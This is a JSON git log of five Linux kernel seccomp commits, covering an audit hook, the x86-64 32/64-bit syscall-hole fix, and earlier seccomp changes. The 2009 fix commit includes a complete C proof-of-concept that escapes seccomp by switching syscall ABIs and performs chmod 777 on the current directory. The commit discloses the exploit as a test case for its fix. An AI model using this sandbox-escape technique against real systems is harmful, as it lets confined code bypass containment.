)]}'
{
  "log": [
    {
      "commit": "85e7bac33b8d5edafc4e219c7dfdb3d48e0b4e31",
      "tree": "6a1f178de829d2219a65a8563e12f2c8029d4b13",
      "parents": [
        "16c174bd95cb07c9d0ad3fcd8c70f9cea7214c9d"
      ],
      "author": {
        "name": "Eric Paris",
        "email": "eparis@redhat.com",
        "time": "Tue Jan 03 14:23:05 2012 -0500"
      },
      "committer": {
        "name": "Al Viro",
        "email": "viro@zeniv.linux.org.uk",
        "time": "Tue Jan 17 16:16:55 2012 -0500"
      },
      "message": "seccomp: audit abnormal end to a process due to seccomp\n\nThe audit system likes to collect information about processes that end\nabnormally (SIGSEGV) as this may me useful intrusion detection information.\nThis patch adds audit support to collect information when seccomp forces a\ntask to exit because of misbehavior in a similar way.\n\nSigned-off-by: Eric Paris \u003ceparis@redhat.com\u003e\n"
    },
    {
      "commit": "5b1017404aea6d2e552e991b3fd814d839e9cd67",
      "tree": "8af3679beab1541d8c77afe28bc261196f03c083",
      "parents": [
        "ccbe495caa5e604b04d5a31d7459a6f6a76a756c"
      ],
      "author": {
        "name": "Roland McGrath",
        "email": "roland@redhat.com",
        "time": "Fri Feb 27 23:25:54 2009 -0800"
      },
      "committer": {
        "name": "Linus Torvalds",
        "email": "torvalds@linux-foundation.org",
        "time": "Mon Mar 02 15:41:30 2009 -0800"
      },
      "message": "x86-64: seccomp: fix 32/64 syscall hole\n\nOn x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with\nljmp, and then use the \"syscall\" instruction to make a 64-bit system\ncall.  A 64-bit process make a 32-bit system call with int $0x80.\n\nIn both these cases under CONFIG_SECCOMP\u003dy, secure_computing() will use\nthe wrong system call number table.  The fix is simple: test TS_COMPAT\ninstead of TIF_IA32.  Here is an example exploit:\n\n\t/* test case for seccomp circumvention on x86-64\n\n\t   There are two failure modes: compile with -m64 or compile with -m32.\n\n\t   The -m64 case is the worst one, because it does \"chmod 777 .\" (could\n\t   be any chmod call).  The -m32 case demonstrates it was able to do\n\t   stat(), which can glean information but not harm anything directly.\n\n\t   A buggy kernel will let the test do something, print, and exit 1; a\n\t   fixed kernel will make it exit with SIGKILL before it does anything.\n\t*/\n\n\t#define _GNU_SOURCE\n\t#include \u003cassert.h\u003e\n\t#include \u003cinttypes.h\u003e\n\t#include \u003cstdio.h\u003e\n\t#include \u003clinux/prctl.h\u003e\n\t#include \u003csys/stat.h\u003e\n\t#include \u003cunistd.h\u003e\n\t#include \u003casm/unistd.h\u003e\n\n\tint\n\tmain (int argc, char **argv)\n\t{\n\t  char buf[100];\n\t  static const char dot[] \u003d \".\";\n\t  long ret;\n\t  unsigned st[24];\n\n\t  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) !\u003d 0)\n\t    perror (\"prctl(PR_SET_SECCOMP) -- not compiled into kernel?\");\n\n\t#ifdef __x86_64__\n\t  assert ((uintptr_t) dot \u003c (1UL \u003c\u003c 32));\n\t  asm (\"int $0x80 # %0 \u003c- %1(%2 %3)\"\n\t       : \"\u003da\" (ret) : \"0\" (15), \"b\" (dot), \"c\" (0777));\n\t  ret \u003d snprintf (buf, sizeof buf,\n\t\t\t  \"result %ld (check mode on .!)\\n\", ret);\n\t#elif defined __i386__\n\t  asm (\".code32\\n\"\n\t       \"pushl %%cs\\n\"\n\t       \"pushl $2f\\n\"\n\t       \"ljmpl $0x33, $1f\\n\"\n\t       \".code64\\n\"\n\t       \"1: syscall # %0 \u003c- %1(%2 %3)\\n\"\n\t       \"lretl\\n\"\n\t       \".code32\\n\"\n\t       \"2:\"\n\t       : \"\u003da\" (ret) : \"0\" (4), \"D\" (dot), \"S\" (\u0026st));\n\t  if (ret \u003d\u003d 0)\n\t    ret \u003d snprintf (buf, sizeof buf,\n\t\t\t    \"stat . -\u003e st_uid\u003d%u\\n\", st[7]);\n\t  else\n\t    ret \u003d snprintf (buf, sizeof buf, \"result %ld\\n\", ret);\n\t#else\n\t# error \"not this one\"\n\t#endif\n\n\t  write (1, buf, ret);\n\n\t  syscall (__NR_exit, 1);\n\t  return 2;\n\t}\n\nSigned-off-by: Roland McGrath \u003croland@redhat.com\u003e\n[ I don\u0027t know if anybody actually uses seccomp, but it\u0027s enabled in\n  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]\nSigned-off-by: Linus Torvalds \u003ctorvalds@linux-foundation.org\u003e\n"
    },
    {
      "commit": "cf99abace7e07dd8491e7093a9a9ef11d48838ed",
      "tree": "3b7cfd7c76c2c43e6ae3fdaaff3a50a752072424",
      "parents": [
        "1d9d02feeee89e9132034d504c9a45eeaf618a3d"
      ],
      "author": {
        "name": "Andrea Arcangeli",
        "email": "andrea@cpushare.com",
        "time": "Sun Jul 15 23:41:33 2007 -0700"
      },
      "committer": {
        "name": "Linus Torvalds",
        "email": "torvalds@woody.linux-foundation.org",
        "time": "Mon Jul 16 09:05:50 2007 -0700"
      },
      "message": "make seccomp zerocost in schedule\n\nThis follows a suggestion from Chuck Ebbert on how to make seccomp\nabsolutely zerocost in schedule too.  The only remaining footprint of\nseccomp is in terms of the bzImage size that becomes a few bytes (perhaps\neven a few kbytes) larger, measure it if you care in the embedded.\n\nSigned-off-by: Andrea Arcangeli \u003candrea@cpushare.com\u003e\nCc: Andi Kleen \u003cak@suse.de\u003e\nSigned-off-by: Andrew Morton \u003cakpm@linux-foundation.org\u003e\nSigned-off-by: Linus Torvalds \u003ctorvalds@linux-foundation.org\u003e\n"
    },
    {
      "commit": "1d9d02feeee89e9132034d504c9a45eeaf618a3d",
      "tree": "a4324cce8acd77cace3b1d4cf3a1e61783707e5c",
      "parents": [
        "be0ef957c9eed4ebae873ee3fbcfb9dfde486dec"
      ],
      "author": {
        "name": "Andrea Arcangeli",
        "email": "andrea@cpushare.com",
        "time": "Sun Jul 15 23:41:32 2007 -0700"
      },
      "committer": {
        "name": "Linus Torvalds",
        "email": "torvalds@woody.linux-foundation.org",
        "time": "Mon Jul 16 09:05:50 2007 -0700"
      },
      "message": "move seccomp from /proc to a prctl\n\nThis reduces the memory footprint and it enforces that only the current\ntask can enable seccomp on itself (this is a requirement for a\nstrightforward [modulo preempt ;) ] TIF_NOTSC implementation).\n\nSigned-off-by: Andrea Arcangeli \u003candrea@cpushare.com\u003e\nSigned-off-by: Andrew Morton \u003cakpm@linux-foundation.org\u003e\nSigned-off-by: Linus Torvalds \u003ctorvalds@linux-foundation.org\u003e\n"
    },
    {
      "commit": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
      "tree": "0bba044c4ce775e45a88a51686b5d9f90697ea9d",
      "parents": [],
      "author": {
        "name": "Linus Torvalds",
        "email": "torvalds@ppc970.osdl.org",
        "time": "Sat Apr 16 15:20:36 2005 -0700"
      },
      "committer": {
        "name": "Linus Torvalds",
        "email": "torvalds@ppc970.osdl.org",
        "time": "Sat Apr 16 15:20:36 2005 -0700"
      },
      "message": "Linux-2.6.12-rc2\n\nInitial git repository build. I\u0027m not bothering with the full history,\neven though we have it. We can create a separate \"historical\" git\narchive of that later if we want to, and in the meantime it\u0027s about\n3.2GB when imported into git - space that would just make the early\ngit days unnecessarily complicated, when we don\u0027t have a lot of good\ninfrastructure for it.\n\nLet it rip!\n"
    }
  ]
}